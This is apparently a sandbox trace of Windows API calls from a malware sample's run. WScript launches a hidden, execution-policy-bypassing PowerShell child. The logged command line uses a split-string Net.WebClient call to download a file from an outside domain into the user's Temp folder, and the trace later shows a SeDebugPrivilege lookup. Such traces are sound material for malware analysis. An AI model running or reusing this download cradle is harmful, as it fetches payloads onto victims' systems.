	[0075.728] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x2a0718
	[0075.728] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a0718) returned 0x2a0b6c
	[0075.728] LockResource (hResData=0x2a0b6c) returned 0x2a0b6c
	[0075.728] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a0718) returned 0x86
	[0075.729] FreeResource (hResData=0x2a0b6c) returned 0
	[0075.729] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x2a07e8
	[0075.729] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0x2a1c74
	[0075.729] LockResource (hResData=0x2a1c74) returned 0x2a1c74
	[0075.729] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0xce
	[0075.729] FreeResource (hResData=0x2a1c74) returned 0
	[0075.729] GetTickCount () returned 0x23a03
	[0075.730] bsearch (_Key=0x113398, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0075.730] ??2@YAPEAX_K@Z () returned 0x49e0d0
	[0075.731] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0075.731] GetProcAddress (hModule=0x7fefea30000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefea4a4c4
	[0075.732] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x1fcfd0 | out: lpclsid=0x1fcfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0075.735] SysStringLen (param_1=0x0) returned 0x0
	[0075.735] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetClassObject") returned 0x7fefea62e18
	[0075.735] CoGetClassObject (in: rclsid=0x1fcfd0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fedf566300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fcfa0 | out: ppv=0x1fcfa0*=0x520b90) returned 0x0
	[0075.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1fb270 | out: lpSystemTimeAsFileTime=0x1fb270*(dwLowDateTime=0xa58b5f10, dwHighDateTime=0x1d543d1)) 
	[0075.740] GetCurrentProcessId () returned 0xbb0
	[0075.740] GetCurrentThreadId () returned 0xbbc
	[0075.740] GetTickCount () returned 0x23a12
	[0075.740] QueryPerformanceCounter (in: lpPerformanceCount=0x1fb278 | out: lpPerformanceCount=0x1fb278*=20016612310) returned 1
	[0075.740] malloc (_Size=0x100) returned 0x5204c0
	[0075.740] GetVersionExA (in: lpVersionInformation=0x1fb050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf24b2dc8, dwBuildNumber=0x7fe, dwPlatformId=0xf24a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x1fb050*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0075.740] GetUserDefaultLCID () returned 0x409
	[0075.740] ??2@YAPEAX_K@Z () returned 0x520b90
	[0075.741] ??2@YAPEAX_K@Z () returned 0x535f90
	[0075.741] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1fcdd0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0075.741] lstrlenA (lpString="\\wscript.exe") returned 12
	[0075.741] lstrlenA (lpString="C:\\Windows\\System32\\WScript.exe") returned 31
	[0075.741] _strcmpi (_Str1="\\WScript.exe", _Str2="\\wscript.exe") returned 0
	[0075.741] GetModuleHandleA (lpModuleName=0x0) returned 0xff540000
	[0075.741] GetProcAddress (hModule=0xff540000, lpProcName=0x1) returned 0xff54d7f8
	[0075.741] ??3@YAXPEAX@Z () returned 0x3b003e0001
	[0075.741] GetTickCount () returned 0x23a12
	[0075.741] malloc (_Size=0x808) returned 0x548280
	[0075.755] CreateErrorInfo (in: pperrinfo=0x1fc070 | out: pperrinfo=0x1fc070*=0x3ca718) returned 0x0
	[0075.756] CErrorObject::SetGUID () returned 0x0
	[0075.756] CErrorObject::SetSource () returned 0x0
	[0075.756] LoadStringW (in: hInstance=0x7fef24a0000, uID=0x1004, lpBuffer=0x1fa7b0, cchBufferMax=2048 | out: lpBuffer="The shortcut pathname must end with .lnk or .url.") returned 0x31
	[0075.756] FormatMessageW (in: dwFlags=0x500, lpSource=0x3ce5d8, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1fc080, nSize=0x0, Arguments=0x1fc0f0 | out: lpBuffer="\xb590\x41") returned 0x31
	[0075.756] CErrorObject::SetDescription () returned 0x0
	[0075.756] CErrorObject::SetHelpFile () returned 0x0
	[0075.756] CErrorObject::SetHelpContext () returned 0x0
	[0075.757] QueryInterface () returned 0x0
	[0075.757] SetErrorInfo (dwReserved=0x0, perrinfo=0x3ca710) returned 0x0
	[0075.757] Release () returned 0x2
	[0075.757] IUnknown:Release (This=0x3ca710) returned 0x1
	[0075.757] LocalFree (hMem=0x41b590) returned 0x0
	[0075.757] IUnknown:Release (This=0x41a300) returned 0x1
	[0075.758] CLSIDFromProgIDEx (in: lpszProgID="shell.applicatiOn", lpclsid=0x1fb240 | out: lpclsid=0x1fb240*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0075.761] SysStringLen (param_1=0x0) returned 0x0
	[0075.761] CoGetClassObject (in: rclsid=0x1fb240*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fedf566300*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fb210 | out: ppv=0x1fb210*=0x7fefdfd8d20) returned 0x0
	[0075.762] Shell:IUnknown:QueryInterface (in: This=0x7fefdfd8d20, riid=0x7fedf566310*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x1fb218 | out: ppvObject=0x1fb218*=0x0) returned 0x80004002
	[0075.762] Shell:IClassFactory:CreateInstance (in: This=0x7fefdfd8d20, pUnkOuter=0x0, riid=0x7fedf566350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fb200 | out: ppvObject=0x1fb200*=0x3ca710) returned 0x0
	[0075.852] Shell:IUnknown:Release (This=0x7fefdfd8d20) returned 0x1
	[0075.852] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf566320*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x1fb1e0 | out: ppvObject=0x1fb1e0*=0x3ca750) returned 0x0
	[0075.853] ??2@YAPEAX_K@Z () returned 0x520830
	[0075.853] Shell:IObjectWithSite:SetSite (This=0x3ca750, pUnkSite=0x520830) returned 0x0
	[0075.853] Shell:IUnknown:AddRef (This=0x520830) returned 0x2
	[0075.853] Shell:IUnknown:Release (This=0x3ca750) returned 0x1
	[0075.853] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf566370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x1fb1b8 | out: ppvObject=0x1fb1b8*=0x0) returned 0x80004002
	[0075.853] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf566518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x1fb130 | out: ppvObject=0x1fb130*=0x0) returned 0x80004002
	[0075.853] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf5664f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x1fb138 | out: ppvObject=0x1fb138*=0x0) returned 0x80004002
	[0075.853] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf566508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x1fb140 | out: ppvObject=0x1fb140*=0x0) returned 0x80004002
	[0075.853] Shell:IUnknown:QueryInterface (in: This=0x3ca710, riid=0x7fedf566340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fb148 | out: ppvObject=0x1fb148*=0x3ca710) returned 0x0
	[0075.853] GetTickCount () returned 0x23a80
	[0075.853] Shell:IUnknown:Release (This=0x3ca710) returned 0x1
	[0075.853] realloc (_Block=0x4d2b40, _Size=0x140) returned 0x4a31a0
	[0075.855] MulDiv (nNumber=958, nNumerator=100, nDenominator=3511) returned 27
	[0075.855] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.855] GetTickCount () returned 0x23a80
	[0075.857] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0075.857] IUnknown:Release (This=0x39f420) returned 0x1
	[0075.857] GetTickCount () returned 0x23a8f
	[0075.858] FindResourceA (hModule=0x7fedf4c0000, lpName=0x2, lpType=0x6) returned 0x2a0718
	[0075.858] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a0718) returned 0x2a0b6c
	[0075.858] LockResource (hResData=0x2a0b6c) returned 0x2a0b6c
	[0075.858] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a0718) returned 0x86
	[0075.859] FreeResource (hResData=0x2a0b6c) returned 0
	[0075.859] FindResourceA (hModule=0x7fedf4c0000, lpName=0x101, lpType=0x6) returned 0x2a07e8
	[0075.859] LoadResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0x2a1c74
	[0075.859] LockResource (hResData=0x2a1c74) returned 0x2a1c74
	[0075.859] SizeofResource (hModule=0x7fedf4c0000, hResInfo=0x2a07e8) returned 0xce
	[0075.859] FreeResource (hResData=0x2a1c74) returned 0
	[0075.860] bsearch (_Key=0x113398, _Base=0x7fedf58a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fedf5181a0) returned 0x7fedf58a410
	[0077.157] SendMessageA (hWnd=0x3022e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0077.159] SendMessageA (hWnd=0x3022e, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0077.159] PostMessageA (hWnd=0x3022e, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0077.160] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x1ffa10*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0077.161] CloseHandle (hObject=0xd4) returned 1
	[0077.161] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.161] IUnknown:Release (This=0x3ae5f0) returned 0x0
	[0077.161] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.161] IUnknown:Release (This=0x3ae6a0) returned 0x0
	[0077.161] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.161] IUnknown:Release (This=0x3ae750) returned 0x0
	[0077.161] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.161] IUnknown:Release (This=0x3ae540) returned 0x0
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] GetProcessHeap () returned 0x380000
	[0077.162] HeapFree (in: hHeap=0x380000, dwFlags=0x0, lpMem=0x3eae20 | out: hHeap=0x380000) returned 1
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x1ffa40 | out: lplpMessageFilter=0x1ffa40*=0x2b5f80) returned 0x0
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] ??3@YAXPEAX@Z () returned 0x5a59f501
	[0077.162] CoUninitialize () 
	[0077.162] DllCanUnloadNow () returned 0x0
	[0077.162] DllCanUnloadNow () 

Thread:
	id = 149
	os_tid = 0xb6c


Thread:
	id = 150
	os_tid = 0xb9c

	[0072.650] GetClassInfoA (in: hInstance=0xff540000, lpClassName="WSH-Timer", lpWndClass=0x286fed0 | out: lpWndClass=0x286fed0) returned 0
	[0072.651] RegisterClassA (lpWndClass=0x286fed0) returned 0x9006ac138
	[0072.651] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff540000, lpParam=0x2b5a60) returned 0x3022e
	[0072.652] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x0
	[0072.652] NtdllDefWindowProc_A (hWnd=0x3022e, Msg=0x24, wParam=0x0, lParam=0x286f8c0) returned 0x0
	[0072.652] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x0
	[0072.652] SetWindowLongPtrA (hWnd=0x3022e, nIndex=-21, dwNewLong=0x2b5a60) returned 0x0
	[0072.652] NtdllDefWindowProc_A (hWnd=0x3022e, Msg=0x81, wParam=0x0, lParam=0x286f880) returned 0x1
	[0072.653] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x2b5a60
	[0072.653] NtdllDefWindowProc_A (hWnd=0x3022e, Msg=0x83, wParam=0x0, lParam=0x286f8e0) returned 0x0
	[0072.661] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x2b5a60
	[0072.661] NtdllDefWindowProc_A (hWnd=0x3022e, Msg=0x1, wParam=0x0, lParam=0x286f880) returned 0x0
	[0072.662] SetEvent (hEvent=0xcc) returned 1
	[0072.698] GetMessageA (in: lpMsg=0x286fea0, hWnd=0x3022e, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x286fea0) returned 0
	[0077.157] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x2b5a60
	[0077.159] GetWindowLongPtrA (hWnd=0x3022e, nIndex=-21) returned 0x2b5a60

Thread:
	id = 152
	os_tid = 0xb5c


Thread:
	id = 153
	os_tid = 0xc0


Thread:
	id = 155
	os_tid = 0x888


Thread:
	id = 157
	os_tid = 0x8bc


Thread:
	id = 158
	os_tid = 0xba4


Thread:
	id = 163
	os_tid = 0x154


Thread:
	id = 167
	os_tid = 0x8ec


Process:
	id = "18"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x44ec6000"
	os_pid = "0xbc4"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "16"
	os_parent_pid = "0xba0"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 148
	os_tid = 0xba8

	[0074.486] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0075.285] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0075.285] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0075.285] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0075.286] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0076.913] GetVersionExW (in: lpVersionInformation=0xddf90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xddf90*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0076.915] GetVersionExW (in: lpVersionInformation=0xddf90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xddf90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0076.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xddbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0076.929] GetVersionExW (in: lpVersionInformation=0xddd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xddd00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0076.930] SetErrorMode (uMode=0x1) returned 0x1
	[0076.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xdde60 | out: lpFileInformation=0xdde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0076.932] SetErrorMode (uMode=0x1) returned 0x1
	[0077.202] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xde0d0 | out: lpdwHandle=0xde0d0) returned 0x94c
	[0077.204] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc7370 | out: lpData=0x2cc7370) returned 1
	[0077.206] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xde048, puLen=0xde040 | out: lplpBuffer=0xde048*=0x2cc740c, puLen=0xde040) returned 1
	[0077.208] lstrlenW (lpString="䅁") returned 1
	[0077.217] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc74e8, puLen=0xddfb0) returned 1
	[0077.218] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0077.220] CoTaskMemAlloc (cb=0x2e) returned 0x2f3fd0
	[0077.220] lstrcpyW (in: lpString1=0x2f3fd0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0077.221] CoTaskMemFree (pv=0x2f3fd0) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc753c, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="System.Management.Automation") returned 28
	[0077.221] CoTaskMemAlloc (cb=0x3c) returned 0x29b340
	[0077.221] lstrcpyW (in: lpString1=0x29b340, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0077.221] CoTaskMemFree (pv=0x29b340) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc7598, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0077.221] CoTaskMemAlloc (cb=0x20) returned 0x2fa130
	[0077.221] lstrcpyW (in: lpString1=0x2fa130, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0077.221] CoTaskMemFree (pv=0x2fa130) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc75d8, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0077.221] CoTaskMemAlloc (cb=0x44) returned 0x29b340
	[0077.221] lstrcpyW (in: lpString1=0x29b340, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0077.221] CoTaskMemFree (pv=0x29b340) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc7640, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0077.221] CoTaskMemAlloc (cb=0x76) returned 0x286830
	[0077.221] lstrcpyW (in: lpString1=0x286830, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0077.221] CoTaskMemFree (pv=0x286830) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc76dc, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0077.221] CoTaskMemAlloc (cb=0x44) returned 0x29b340
	[0077.221] lstrcpyW (in: lpString1=0x29b340, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0077.221] CoTaskMemFree (pv=0x29b340) 
	[0077.221] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc7740, puLen=0xddfb0) returned 1
	[0077.221] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0077.221] CoTaskMemAlloc (cb=0x58) returned 0x2441c0
	[0077.221] lstrcpyW (in: lpString1=0x2441c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0077.222] CoTaskMemFree (pv=0x2441c0) 
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc77bc, puLen=0xddfb0) returned 1
	[0077.222] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0077.222] CoTaskMemAlloc (cb=0x20) returned 0x2fa130
	[0077.222] lstrcpyW (in: lpString1=0x2fa130, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0077.222] CoTaskMemFree (pv=0x2fa130) 
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x2cc7464, puLen=0xddfb0) returned 1
	[0077.222] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0077.222] CoTaskMemAlloc (cb=0x66) returned 0x2f7f60
	[0077.222] lstrcpyW (in: lpString1=0x2f7f60, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0077.222] CoTaskMemFree (pv=0x2f7f60) 
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x0, puLen=0xddfb0) returned 0
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x0, puLen=0xddfb0) returned 0
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xddfb8, puLen=0xddfb0 | out: lplpBuffer=0xddfb8*=0x0, puLen=0xddfb0) returned 0
	[0077.222] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xddf88, puLen=0xddf80 | out: lplpBuffer=0xddf88*=0x2cc740c, puLen=0xddf80) returned 1
	[0077.223] CoTaskMemAlloc (cb=0x204) returned 0x289180
	[0077.223] VerLanguageNameW (in: wLang=0x0, szLang=0x289180, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0077.224] CoTaskMemFree (pv=0x289180) 
	[0077.224] VerQueryValueW (in: pBlock=0x2cc7370, lpSubBlock="\\", lplpBuffer=0xddfd8, puLen=0xddfd0 | out: lplpBuffer=0xddfd8*=0x2cc7398, puLen=0xddfd0) returned 1
	[0077.232] GetCurrentProcessId () returned 0xbc4
	[0077.455] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdcf00 | out: lpLuid=0xdcf00*(LowPart=0x14, HighPart=0)) returned 1
	[0077.458] GetCurrentProcess () returned 0xffffffffffffffff
